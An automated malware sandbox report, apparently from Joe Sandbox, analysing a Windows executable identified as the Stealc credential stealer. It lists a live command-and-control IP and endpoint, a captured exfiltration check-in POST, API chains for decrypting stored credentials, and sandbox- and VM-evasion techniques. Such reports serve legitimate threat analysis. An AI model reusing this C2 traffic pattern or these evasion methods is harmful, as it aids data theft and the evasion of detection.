Source: 0.2.file.exe.7b0000.0.unpack String decryptor: build
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: token
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: file_name
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: file
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: message
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: screenshot.jpg
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_007C9030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_007BA210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BA2B0 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_007BA2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_007B72A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_007BC920
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_007C40F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_007BE530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007B1710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_007C47C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007BF7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007C4B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007C3B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_007BDB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_007BBE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_007BEE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007BDF10

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49702 -> 185.215.113.206:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49744
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49952
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_007B62D0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 38 36 35 35 44 37 31 46 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="hwid"698655D71FEC2273848308------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="build"tale------EBAAAFBGDBKKEBGCFCBF--
Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/.IE5
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/2O
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php#
Source: file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=YV
Source: file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php?
Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/aO
Source: file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 0_2_00BFE0A5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ACC03C 0_2_00ACC03C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C03063 0_2_00C03063
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F0098 0_2_007F0098
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EC3000 0_2_00EC3000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0080B198 0_2_0080B198
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B70198 0_2_00B70198
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E2138 0_2_007E2138
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0824B 0_2_00C0824B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0081E258 0_2_0081E258
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F4288 0_2_007F4288
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0082D39E 0_2_0082D39E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0083B308 0_2_0083B308
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C81315 0_2_00C81315
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B064D7 0_2_00B064D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0D429 0_2_00C0D429
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007D4573 0_2_007D4573
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0081D5A8 0_2_0081D5A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DE544 0_2_007DE544
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F45A8 0_2_007F45A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C016C5 0_2_00C016C5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008396FD 0_2_008396FD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F66C8 0_2_007F66C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0082A648 0_2_0082A648
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C067C6 0_2_00C067C6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00826799 0_2_00826799
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0080D720 0_2_0080D720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C0B8CA 0_2_00C0B8CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0080B8A8 0_2_0080B8A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008098B8 0_2_008098B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0081F8D6 0_2_0081F8D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B4883B 0_2_00B4883B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00804868 0_2_00804868
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00820B88 0_2_00820B88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00824BA8 0_2_00824BA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00818BD9 0_2_00818BD9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B09BDE 0_2_00B09BDE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BB4B4E 0_2_00BB4B4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0082AC28 0_2_0082AC28
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C09C6B 0_2_00C09C6B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E1D78 0_2_007E1D78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B5AD98 0_2_00B5AD98
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00805DB9 0_2_00805DB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00804DC8 0_2_00804DC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B75D2A 0_2_00B75D2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B1BD15 0_2_00B1BD15
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFAD0E 0_2_00BFAD0E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0081AD38 0_2_0081AD38
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0080BD68 0_2_0080BD68
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F8E78 0_2_007F8E78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00821EE8 0_2_00821EE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B68ED9 0_2_00B68ED9
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 007B4610 appears 316 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: lolfhxxi ZLIB complexity 0.994913422527048
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_007C9790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_007C3970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OX1A1DLO.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 2095104 > 1048576
Source: file.exe Static PE information: Raw size of lolfhxxi is bigger than: 0x100000 < 0x194600
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.7b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lolfhxxi:EW;swlqukzj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lolfhxxi:EW;swlqukzj:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007C9BB0
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x2040e8 should be: 0x2032cf
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: lolfhxxi
Source: file.exe Static PE information: section name: swlqukzj
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9EFB2 push edx; mov dword ptr [esp], ebp 0_2_00A9F062
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9EFB2 push 14007003h; mov dword ptr [esp], edx 0_2_00A9F06A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9EFB2 push 1270E709h; mov dword ptr [esp], esi 0_2_00A9F072
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CD50D8 push ecx; mov dword ptr [esp], 7EF691CEh 0_2_00CD50FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CD50D8 push 19F96B7Ch; mov dword ptr [esp], ebp 0_2_00CD51E8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], 6F8FB557h 0_2_00BFE0AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi 0_2_00BFE0E4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], ebx 0_2_00BFE0ED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], esp 0_2_00BFE132
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 4AAF583Ch 0_2_00BFE194
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 125DE493h; mov dword ptr [esp], esi 0_2_00BFE1B1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], ebx 0_2_00BFE293
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], edx 0_2_00BFE356
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], eax 0_2_00BFE46F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 7EEE1290h 0_2_00BFE473
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 10D1BF57h; mov dword ptr [esp], eax 0_2_00BFE50E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push ebp; mov dword ptr [esp], ecx 0_2_00BFE5E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 415528C0h; mov dword ptr [esp], esi 0_2_00BFE5F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi 0_2_00BFE67F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], 3248D001h 0_2_00BFE697
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 59B54900h; mov dword ptr [esp], esp 0_2_00BFE6A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push ebx; mov dword ptr [esp], edi 0_2_00BFE6C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edi; mov dword ptr [esp], edx 0_2_00BFE702
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 03E74006h; mov dword ptr [esp], edx 0_2_00BFE714
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push ecx; mov dword ptr [esp], 07B6B7D8h 0_2_00BFE73D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 667103DBh; mov dword ptr [esp], ebx 0_2_00BFE7D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push eax; mov dword ptr [esp], 6F7F77E1h 0_2_00BFE807
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], edi 0_2_00BFE825
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], ecx 0_2_00BFE829
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push 55723D11h; mov dword ptr [esp], ecx 0_2_00BFE831
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BFE0A5 push edx; mov dword ptr [esp], 5AF6E9C6h 0_2_00BFE885
Source: file.exe Static PE information: section name: lolfhxxi entropy: 7.954139609313276

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007C9BB0

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D9EC second address: A9D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1114F second address: C1115F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1115F second address: C1116F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Bh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C114FF second address: C11503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11503 second address: C1150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC41CDAB666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
